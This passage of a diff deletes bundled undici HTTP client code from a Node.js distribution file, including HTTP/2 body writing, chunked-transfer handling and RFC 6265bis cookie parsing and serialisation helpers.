- } - }) - - stream.once('error', function (err) { - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - stream.once('frameError', (type, code) => { - const err = new 
InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - errorRequest(client, request, err) - - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - // stream.on('aborted', () => { - // // TODO(HTTP/2): Support aborted - // }) - - // stream.on('timeout', () => { - // // TODO(HTTP/2): Support timeout - // }) - - // stream.on('push', headers => { - // // TODO(HTTP/2): Suppor push - // }) - - // stream.on('trailers', headers => { - // // TODO(HTTP/2): Support trailers - // }) - - return true - - function writeBodyH2 () { - /* istanbul ignore else: assertion */ - if (!body) { - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - stream.cork() - stream.write(body) - stream.uncork() - stream.end() - request.onBodySent(body) - request.onRequestSent() - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ - client, - request, - contentLength, - h2stream: stream, - expectsPayload, - body: body.stream(), - socket: client[kSocket], - header: '' - }) - } else { - writeBlob({ - body, - client, - request, - contentLength, - expectsPayload, - h2stream: stream, - header: '', - socket: client[kSocket] - }) - } - } else if (util.isStream(body)) { - writeStream({ - body, - client, - request, - contentLength, - expectsPayload, - socket: client[kSocket], - h2stream: stream, - header: '' - }) - } else if (util.isIterable(body)) { - writeIterable({ - body, - client, - request, - contentLength, - expectsPayload, - header: '', - h2stream: stream, - socket: client[kSocket] - }) - } else { - assert(false) - } - } -} - -function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') - - if 
(client[kHTTPConnVersion] === 'h2') { - // For HTTP/2, is enough to pipe the stream - const pipe = pipeline( - body, - h2stream, - (err) => { - if (err) { - util.destroy(body, err) - util.destroy(h2stream, err) - } else { - request.onRequestSent() - } - } - ) - - pipe.on('data', onPipeData) - pipe.once('end', () => { - pipe.removeListener('data', onPipeData) - util.destroy(pipe) - }) - - function onPipeData (chunk) { - request.onBodySent(chunk) - } - - return - } - - let finished = false - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - - const onData = function (chunk) { - if (finished) { - return - } - - try { - if (!writer.write(chunk) && this.pause) { - this.pause() - } - } catch (err) { - util.destroy(this, err) - } - } - const onDrain = function () { - if (finished) { - return - } - - if (body.resume) { - body.resume() - } - } - const onAbort = function () { - if (finished) { - return - } - const err = new RequestAbortedError() - queueMicrotask(() => onFinished(err)) - } - const onFinished = function (err) { - if (finished) { - return - } - - finished = true - - assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) - - socket - .off('drain', onDrain) - .off('error', onFinished) - - body - .removeListener('data', onData) - .removeListener('end', onFinished) - .removeListener('error', onFinished) - .removeListener('close', onAbort) - - if (!err) { - try { - writer.end() - } catch (er) { - err = er - } - } - - writer.destroy(err) - - if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { - util.destroy(body, err) - } else { - util.destroy(body) - } - } - - body - .on('data', onData) - .on('end', onFinished) - .on('error', onFinished) - .on('close', onAbort) - - if (body.resume) { - body.resume() - } - - socket - .on('drain', onDrain) - .on('error', onFinished) -} - -async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) 
{ - assert(contentLength === body.size, 'blob body must have content length') - - const isH2 = client[kHTTPConnVersion] === 'h2' - try { - if (contentLength != null && contentLength !== body.size) { - throw new RequestContentLengthMismatchError() - } - - const buffer = Buffer.from(await body.arrayBuffer()) - - if (isH2) { - h2stream.cork() - h2stream.write(buffer) - h2stream.uncork() - } else { - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(buffer) - socket.uncork() - } - - request.onBodySent(buffer) - request.onRequestSent() - - if (!expectsPayload) { - socket[kReset] = true - } - - resume(client) - } catch (err) { - util.destroy(isH2 ? h2stream : socket, err) - } -} - -async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') - - let callback = null - function onDrain () { - if (callback) { - const cb = callback - callback = null - cb() - } - } - - const waitForDrain = () => new Promise((resolve, reject) => { - assert(callback === null) - - if (socket[kError]) { - reject(socket[kError]) - } else { - callback = resolve - } - }) - - if (client[kHTTPConnVersion] === 'h2') { - h2stream - .on('close', onDrain) - .on('drain', onDrain) - - try { - // It's up to the user to somehow abort the async iterable. 
- for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - const res = h2stream.write(chunk) - request.onBodySent(chunk) - if (!res) { - await waitForDrain() - } - } - } catch (err) { - h2stream.destroy(err) - } finally { - request.onRequestSent() - h2stream.end() - h2stream - .off('close', onDrain) - .off('drain', onDrain) - } - - return - } - - socket - .on('close', onDrain) - .on('drain', onDrain) - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - try { - // It's up to the user to somehow abort the async iterable. - for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - if (!writer.write(chunk)) { - await waitForDrain() - } - } - - writer.end() - } catch (err) { - writer.destroy(err) - } finally { - socket - .off('close', onDrain) - .off('drain', onDrain) - } -} - -class AsyncWriter { - constructor ({ socket, request, contentLength, client, expectsPayload, header }) { - this.socket = socket - this.request = request - this.contentLength = contentLength - this.client = client - this.bytesWritten = 0 - this.expectsPayload = expectsPayload - this.header = header - - socket[kWriting] = true - } - - write (chunk) { - const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return false - } - - const len = Buffer.byteLength(chunk) - if (!len) { - return true - } - - // We should defer writing chunks. 
- if (contentLength !== null && bytesWritten + len > contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - socket.cork() - - if (bytesWritten === 0) { - if (!expectsPayload) { - socket[kReset] = true - } - - if (contentLength === null) { - socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') - } else { - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - } - } - - if (contentLength === null) { - socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') - } - - this.bytesWritten += len - - const ret = socket.write(chunk) - - socket.uncork() - - request.onBodySent(chunk) - - if (!ret) { - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - } - - return ret - } - - end () { - const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this - request.onRequestSent() - - socket[kWriting] = false - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return - } - - if (bytesWritten === 0) { - if (expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD send a Content-Length in a request message when - // no Transfer-Encoding is sent and the request method defines a meaning - // for an enclosed payload body. 
- - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - socket.write(`${header}\r\n`, 'latin1') - } - } else if (contentLength === null) { - socket.write('\r\n0\r\n\r\n', 'latin1') - } - - if (contentLength !== null && bytesWritten !== contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } else { - process.emitWarning(new RequestContentLengthMismatchError()) - } - } - - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - - resume(client) - } - - destroy (err) { - const { socket, client } = this - - socket[kWriting] = false - - if (err) { - assert(client[kRunning] <= 1, 'pipeline should only contain this request') - util.destroy(socket, err) - } - } -} - -function errorRequest (client, request, err) { - try { - request.onError(err) - assert(request.aborted) - } catch (err) { - client.emit('error', err) - } -} - -module.exports = Client - - -/***/ }), - -/***/ 6436: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/* istanbul ignore file: only for Node 12 */ - -const { kConnected, kSize } = __nccwpck_require__(2785) - -class CompatWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value[kConnected] === 0 && this.value[kSize] === 0 - ? 
undefined - : this.value - } -} - -class CompatFinalizer { - constructor (finalizer) { - this.finalizer = finalizer - } - - register (dispatcher, key) { - if (dispatcher.on) { - dispatcher.on('disconnect', () => { - if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { - this.finalizer(key) - } - }) - } - } -} - -module.exports = function () { - // FIXME: remove workaround when the Node bug is fixed - // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 - if (process.env.NODE_V8_COVERAGE) { - return { - WeakRef: CompatWeakRef, - FinalizationRegistry: CompatFinalizer - } - } - return { - WeakRef: global.WeakRef || CompatWeakRef, - FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer - } -} - - -/***/ }), - -/***/ 663: -/***/ ((module) => { - -"use strict"; - - -// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size -const maxAttributeValueSize = 1024 - -// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size -const maxNameValuePairSize = 4096 - -module.exports = { - maxAttributeValueSize, - maxNameValuePairSize -} - - -/***/ }), - -/***/ 1724: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { parseSetCookie } = __nccwpck_require__(4408) -const { stringify, getHeadersList } = __nccwpck_require__(3121) -const { webidl } = __nccwpck_require__(1744) -const { Headers } = __nccwpck_require__(554) - -/** - * @typedef {Object} Cookie - * @property {string} name - * @property {string} value - * @property {Date|number|undefined} expires - * @property {number|undefined} maxAge - * @property {string|undefined} domain - * @property {string|undefined} path - * @property {boolean|undefined} secure - * @property {boolean|undefined} httpOnly - * @property {'Strict'|'Lax'|'None'} sameSite - * @property {string[]} unparsed - */ - -/** - * @param {Headers} headers - * @returns {Record} - */ -function getCookies (headers) { - 
webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookie = headers.get('cookie') - const out = {} - - if (!cookie) { - return out - } - - for (const piece of cookie.split(';')) { - const [name, ...value] = piece.split('=') - - out[name.trim()] = value.join('=') - } - - return out -} - -/** - * @param {Headers} headers - * @param {string} name - * @param {{ path?: string, domain?: string }|undefined} attributes - * @returns {void} - */ -function deleteCookie (headers, name, attributes) { - webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - name = webidl.converters.DOMString(name) - attributes = webidl.converters.DeleteCookieAttributes(attributes) - - // Matches behavior of - // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 - setCookie(headers, { - name, - value: '', - expires: new Date(0), - ...attributes - }) -} - -/** - * @param {Headers} headers - * @returns {Cookie[]} - */ -function getSetCookies (headers) { - webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookies = getHeadersList(headers).cookies - - if (!cookies) { - return [] - } - - // In older versions of undici, cookies is a list of name:value. - return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? 
pair[1] : pair)) -} - -/** - * @param {Headers} headers - * @param {Cookie} cookie - * @returns {void} - */ -function setCookie (headers, cookie) { - webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - cookie = webidl.converters.Cookie(cookie) - - const str = stringify(cookie) - - if (str) { - headers.append('Set-Cookie', stringify(cookie)) - } -} - -webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - } -]) - -webidl.converters.Cookie = webidl.dictionaryConverter([ - { - converter: webidl.converters.DOMString, - key: 'name' - }, - { - converter: webidl.converters.DOMString, - key: 'value' - }, - { - converter: webidl.nullableConverter((value) => { - if (typeof value === 'number') { - return webidl.converters['unsigned long long'](value) - } - - return new Date(value) - }), - key: 'expires', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters['long long']), - key: 'maxAge', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'secure', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'httpOnly', - defaultValue: null - }, - { - converter: webidl.converters.USVString, - key: 'sameSite', - allowedValues: ['Strict', 'Lax', 'None'] - }, - { - converter: webidl.sequenceConverter(webidl.converters.DOMString), - key: 'unparsed', - defaultValue: [] - } -]) - -module.exports = { - getCookies, - 
deleteCookie, - getSetCookies, - setCookie -} - - -/***/ }), - -/***/ 4408: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) -const { isCTLExcludingHtab } = __nccwpck_require__(3121) -const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) -const assert = __nccwpck_require__(9491) - -/** - * @description Parses the field-value attributes of a set-cookie header string. - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} header - * @returns if the header is invalid, null will be returned - */ -function parseSetCookie (header) { - // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F - // character (CTL characters excluding HTAB): Abort these steps and - // ignore the set-cookie-string entirely. - if (isCTLExcludingHtab(header)) { - return null - } - - let nameValuePair = '' - let unparsedAttributes = '' - let name = '' - let value = '' - - // 2. If the set-cookie-string contains a %x3B (";") character: - if (header.includes(';')) { - // 1. The name-value-pair string consists of the characters up to, - // but not including, the first %x3B (";"), and the unparsed- - // attributes consist of the remainder of the set-cookie-string - // (including the %x3B (";") in question). - const position = { position: 0 } - - nameValuePair = collectASequenceOfCodePointsFast(';', header, position) - unparsedAttributes = header.slice(position.position) - } else { - // Otherwise: - - // 1. The name-value-pair string consists of all the characters - // contained in the set-cookie-string, and the unparsed- - // attributes is the empty string. - nameValuePair = header - } - - // 3. If the name-value-pair string lacks a %x3D ("=") character, then - // the name string is empty, and the value string is the value of - // name-value-pair. 
- if (!nameValuePair.includes('=')) { - value = nameValuePair - } else { - // Otherwise, the name string consists of the characters up to, but - // not including, the first %x3D ("=") character, and the (possibly - // empty) value string consists of the characters after the first - // %x3D ("=") character. - const position = { position: 0 } - name = collectASequenceOfCodePointsFast( - '=', - nameValuePair, - position - ) - value = nameValuePair.slice(position.position + 1) - } - - // 4. Remove any leading or trailing WSP characters from the name - // string and the value string. - name = name.trim() - value = value.trim() - - // 5. If the sum of the lengths of the name string and the value string - // is more than 4096 octets, abort these steps and ignore the set- - // cookie-string entirely. - if (name.length + value.length > maxNameValuePairSize) { - return null - } - - // 6. The cookie-name is the name string, and the cookie-value is the - // value string. - return { - name, value, ...parseUnparsedAttributes(unparsedAttributes) - } -} - -/** - * Parses the remaining attributes of a set-cookie header - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} unparsedAttributes - * @param {[Object.]={}} cookieAttributeList - */ -function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { - // 1. If the unparsed-attributes string is empty, skip the rest of - // these steps. - if (unparsedAttributes.length === 0) { - return cookieAttributeList - } - - // 2. Discard the first character of the unparsed-attributes (which - // will be a %x3B (";") character). - assert(unparsedAttributes[0] === ';') - unparsedAttributes = unparsedAttributes.slice(1) - - let cookieAv = '' - - // 3. If the remaining unparsed-attributes contains a %x3B (";") - // character: - if (unparsedAttributes.includes(';')) { - // 1. 
Consume the characters of the unparsed-attributes up to, but - // not including, the first %x3B (";") character. - cookieAv = collectASequenceOfCodePointsFast( - ';', - unparsedAttributes, - { position: 0 } - ) - unparsedAttributes = unparsedAttributes.slice(cookieAv.length) - } else { - // Otherwise: - - // 1. Consume the remainder of the unparsed-attributes. - cookieAv = unparsedAttributes - unparsedAttributes = '' - } - - // Let the cookie-av string be the characters consumed in this step. - - let attributeName = '' - let attributeValue = '' - - // 4. If the cookie-av string contains a %x3D ("=") character: - if (cookieAv.includes('=')) { - // 1. The (possibly empty) attribute-name string consists of the - // characters up to, but not including, the first %x3D ("=") - // character, and the (possibly empty) attribute-value string - // consists of the characters after the first %x3D ("=") - // character. - const position = { position: 0 } - - attributeName = collectASequenceOfCodePointsFast( - '=', - cookieAv, - position - ) - attributeValue = cookieAv.slice(position.position + 1) - } else { - // Otherwise: - - // 1. The attribute-name string consists of the entire cookie-av - // string, and the attribute-value string is empty. - attributeName = cookieAv - } - - // 5. Remove any leading or trailing WSP characters from the attribute- - // name string and the attribute-value string. - attributeName = attributeName.trim() - attributeValue = attributeValue.trim() - - // 6. If the attribute-value is longer than 1024 octets, ignore the - // cookie-av string and return to Step 1 of this algorithm. - if (attributeValue.length > maxAttributeValueSize) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 7. Process the attribute-name and attribute-value according to the - // requirements in the following subsections. (Notice that - // attributes with unrecognized attribute-names are ignored.) 
- const attributeNameLowercase = attributeName.toLowerCase() - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 - // If the attribute-name case-insensitively matches the string - // "Expires", the user agent MUST process the cookie-av as follows. - if (attributeNameLowercase === 'expires') { - // 1. Let the expiry-time be the result of parsing the attribute-value - // as cookie-date (see Section 5.1.1). - const expiryTime = new Date(attributeValue) - - // 2. If the attribute-value failed to parse as a cookie date, ignore - // the cookie-av. - - cookieAttributeList.expires = expiryTime - } else if (attributeNameLowercase === 'max-age') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 - // If the attribute-name case-insensitively matches the string "Max- - // Age", the user agent MUST process the cookie-av as follows. - - // 1. If the first character of the attribute-value is not a DIGIT or a - // "-" character, ignore the cookie-av. - const charCode = attributeValue.charCodeAt(0) - - if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 2. If the remainder of attribute-value contains a non-DIGIT - // character, ignore the cookie-av. - if (!/^\d+$/.test(attributeValue)) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 3. Let delta-seconds be the attribute-value converted to an integer. - const deltaSeconds = Number(attributeValue) - - // 4. Let cookie-age-limit be the maximum age of the cookie (which - // SHOULD be 400 days or less, see Section 4.1.2.2). - - // 5. Set delta-seconds to the smaller of its present value and cookie- - // age-limit. - // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) - - // 6. If delta-seconds is less than or equal to zero (0), let expiry- - // time be the earliest representable date and time. 
Otherwise, let - // the expiry-time be the current date and time plus delta-seconds - // seconds. - // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds - - // 7. Append an attribute to the cookie-attribute-list with an - // attribute-name of Max-Age and an attribute-value of expiry-time. - cookieAttributeList.maxAge = deltaSeconds - } else if (attributeNameLowercase === 'domain') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 - // If the attribute-name case-insensitively matches the string "Domain", - // the user agent MUST process the cookie-av as follows. - - // 1. Let cookie-domain be the attribute-value. - let cookieDomain = attributeValue - - // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be - // cookie-domain without its leading %x2E ("."). - if (cookieDomain[0] === '.') { - cookieDomain = cookieDomain.slice(1) - } - - // 3. Convert the cookie-domain to lower case. - cookieDomain = cookieDomain.toLowerCase() - - // 4. Append an attribute to the cookie-attribute-list with an - // attribute-name of Domain and an attribute-value of cookie-domain. - cookieAttributeList.domain = cookieDomain - } else if (attributeNameLowercase === 'path') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 - // If the attribute-name case-insensitively matches the string "Path", - // the user agent MUST process the cookie-av as follows. - - // 1. If the attribute-value is empty or if the first character of the - // attribute-value is not %x2F ("/"): - let cookiePath = '' - if (attributeValue.length === 0 || attributeValue[0] !== '/') { - // 1. Let cookie-path be the default-path. - cookiePath = '/' - } else { - // Otherwise: - - // 1. Let cookie-path be the attribute-value. - cookiePath = attributeValue - } - - // 2. Append an attribute to the cookie-attribute-list with an - // attribute-name of Path and an attribute-value of cookie-path. 
- cookieAttributeList.path = cookiePath - } else if (attributeNameLowercase === 'secure') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 - // If the attribute-name case-insensitively matches the string "Secure", - // the user agent MUST append an attribute to the cookie-attribute-list - // with an attribute-name of Secure and an empty attribute-value. - - cookieAttributeList.secure = true - } else if (attributeNameLowercase === 'httponly') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 - // If the attribute-name case-insensitively matches the string - // "HttpOnly", the user agent MUST append an attribute to the cookie- - // attribute-list with an attribute-name of HttpOnly and an empty - // attribute-value. - - cookieAttributeList.httpOnly = true - } else if (attributeNameLowercase === 'samesite') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 - // If the attribute-name case-insensitively matches the string - // "SameSite", the user agent MUST process the cookie-av as follows: - - // 1. Let enforcement be "Default". - let enforcement = 'Default' - - const attributeValueLowercase = attributeValue.toLowerCase() - // 2. If cookie-av's attribute-value is a case-insensitive match for - // "None", set enforcement to "None". - if (attributeValueLowercase.includes('none')) { - enforcement = 'None' - } - - // 3. If cookie-av's attribute-value is a case-insensitive match for - // "Strict", set enforcement to "Strict". - if (attributeValueLowercase.includes('strict')) { - enforcement = 'Strict' - } - - // 4. If cookie-av's attribute-value is a case-insensitive match for - // "Lax", set enforcement to "Lax". - if (attributeValueLowercase.includes('lax')) { - enforcement = 'Lax' - } - - // 5. Append an attribute to the cookie-attribute-list with an - // attribute-name of "SameSite" and an attribute-value of - // enforcement. 
- cookieAttributeList.sameSite = enforcement - } else { - cookieAttributeList.unparsed ??= [] - - cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) - } - - // 8. Return to Step 1 of this algorithm. - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) -} - -module.exports = { - parseSetCookie, - parseUnparsedAttributes -} - - -/***/ }), - -/***/ 3121: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kHeadersList } = __nccwpck_require__(2785) - -function isCTLExcludingHtab (value) { - if (value.length === 0) { - return false - } - - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - (code >= 0x00 || code <= 0x08) || - (code >= 0x0A || code <= 0x1F) || - code === 0x7F - ) { - return false - } - } -} - -/** - CHAR = - token = 1* - separators = "(" | ")" | "<" | ">" | "@" - | "," | ";" | ":" | "\" | <"> - | "/" | "[" | "]" | "?" | "=" - | "{" | "}" | SP | HT - * @param {string} name - */ -function validateCookieName (name) { - for (const char of name) { - const code = char.charCodeAt(0) - - if ( - (code <= 0x20 || code > 0x7F) || - char === '(' || - char === ')' || - char === '>' || - char === '<' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' 
|| - char === '=' || - char === '{' || - char === '}' - ) { - throw new Error('Invalid cookie name') - } - } -} - -/** - cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) - cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E - ; US-ASCII characters excluding CTLs, - ; whitespace DQUOTE, comma, semicolon, - ; and backslash - * @param {string} value - */ -function validateCookieValue (value) { - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || // exclude CTLs (0-31) - code === 0x22 || - code === 0x2C || - code === 0x3B || - code === 0x5C || - code > 0x7E // non-ascii - ) { - throw new Error('Invalid header value') - } - } -} - -/** - * path-value = - * @param {string} path - */ -function validateCookiePath (path) { - for (const char of path) { - const code = char.charCodeAt(0) - - if (code < 0x21 || char === ';') { - throw new Error('Invalid cookie path') - } - } -} - -/** - * I have no idea why these values aren't allowed to be honest, - * but Deno tests these. 
- Khafra - * @param {string} domain - */ -function validateCookieDomain (domain) { - if ( - domain.startsWith('-') || - domain.endsWith('.') || - domain.endsWith('-') - ) { - throw new Error('Invalid cookie domain') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 - * @param {number|Date} date - IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT - ; fixed length/zone/capitalization subset of the format - ; see Section 3.3 of [RFC5322] - - day-name = %x4D.6F.6E ; "Mon", case-sensitive - / %x54.75.65 ; "Tue", case-sensitive - / %x57.65.64 ; "Wed", case-sensitive - / %x54.68.75 ; "Thu", case-sensitive - / %x46.72.69 ; "Fri", case-sensitive - / %x53.61.74 ; "Sat", case-sensitive - / %x53.75.6E ; "Sun", case-sensitive - date1 = day SP month SP year - ; e.g., 02 Jun 1982 - - day = 2DIGIT - month = %x4A.61.6E ; "Jan", case-sensitive - / %x46.65.62 ; "Feb", case-sensitive - / %x4D.61.72 ; "Mar", case-sensitive - / %x41.70.72 ; "Apr", case-sensitive - / %x4D.61.79 ; "May", case-sensitive - / %x4A.75.6E ; "Jun", case-sensitive - / %x4A.75.6C ; "Jul", case-sensitive - / %x41.75.67 ; "Aug", case-sensitive - / %x53.65.70 ; "Sep", case-sensitive - / %x4F.63.74 ; "Oct", case-sensitive - / %x4E.6F.76 ; "Nov", case-sensitive - / %x44.65.63 ; "Dec", case-sensitive - year = 4DIGIT - - GMT = %x47.4D.54 ; "GMT", case-sensitive - - time-of-day = hour ":" minute ":" second - ; 00:00:00 - 23:59:60 (leap second) - - hour = 2DIGIT - minute = 2DIGIT - second = 2DIGIT - */ -function toIMFDate (date) { - if (typeof date === 'number') { - date = new Date(date) - } - - const days = [ - 'Sun', 'Mon', 'Tue', 'Wed', - 'Thu', 'Fri', 'Sat' - ] - - const months = [ - 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', - 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' - ] - - const dayName = days[date.getUTCDay()] - const day = date.getUTCDate().toString().padStart(2, '0') - const month = months[date.getUTCMonth()] - const year = date.getUTCFullYear() - const hour = 
date.getUTCHours().toString().padStart(2, '0') - const minute = date.getUTCMinutes().toString().padStart(2, '0') - const second = date.getUTCSeconds().toString().padStart(2, '0') - - return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` -} - -/** - max-age-av = "Max-Age=" non-zero-digit *DIGIT - ; In practice, both expires-av and max-age-av - ; are limited to dates representable by the - ; user agent. - * @param {number} maxAge - */ -function validateCookieMaxAge (maxAge) { - if (maxAge < 0) { - throw new Error('Invalid cookie max-age') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 - * @param {import('./index').Cookie} cookie - */ -function stringify (cookie) { - if (cookie.name.length === 0) { - return null - } - - validateCookieName(cookie.name) - validateCookieValue(cookie.value) - - const out = [`${cookie.name}=${cookie.value}`] - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 - if (cookie.name.startsWith('__Secure-')) { - cookie.secure = true - } - - if (cookie.name.startsWith('__Host-')) { - cookie.secure = true - cookie.domain = null - cookie.path = '/' - } - - if (cookie.secure) { - out.push('Secure') - } - - if (cookie.httpOnly) { - out.push('HttpOnly') - } - - if (typeof cookie.maxAge === 'number') { - validateCookieMaxAge(cookie.maxAge) - out.push(`Max-Age=${cookie.maxAge}`) - } - - if (cookie.domain) { - validateCookieDomain(cookie.domain) - out.push(`Domain=${cookie.domain}`) - } - - if (cookie.path) { - validateCookiePath(cookie.path) - out.push(`Path=${cookie.path}`) - } - - if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { - out.push(`Expires=${toIMFDate(cookie.expires)}`) - } - - if (cookie.sameSite) { - out.push(`SameSite=${cookie.sameSite}`) - } - - for (const part of cookie.unparsed) { - if (!part.includes('=')) { - throw new 
Error('Invalid unparsed') - } - - const [key, ...value] = part.split('=') - - out.push(`${key.trim()}=${value.join('=')}`) - } - - return out.join('; ') -} - -let kHeadersListNode - -function getHeadersList (headers) { - if (headers[kHeadersList]) { - return headers[kHeadersList] - } - - if (!kHeadersListNode) { - kHeadersListNode = Object.getOwnPropertySymbols(headers).find( - (symbol) => symbol.description === 'headers list' - ) - - assert(kHeadersListNode, 'Headers cannot be parsed') - } - - const headersList = headers[kHeadersListNode] - assert(headersList) - - return headersList -} - -module.exports = { - isCTLExcludingHtab, - stringify, - getHeadersList -} - - -/***/ }), - -/***/ 2067: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const net = __nccwpck_require__(1808) -const assert = __nccwpck_require__(9491) -const util = __nccwpck_require__(3983) -const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) - -let tls // include tls conditionally since it is not always available - -// TODO: session re-use does not wait for the first -// connection to resolve the session and might therefore -// resolve the same servername multiple times even when -// 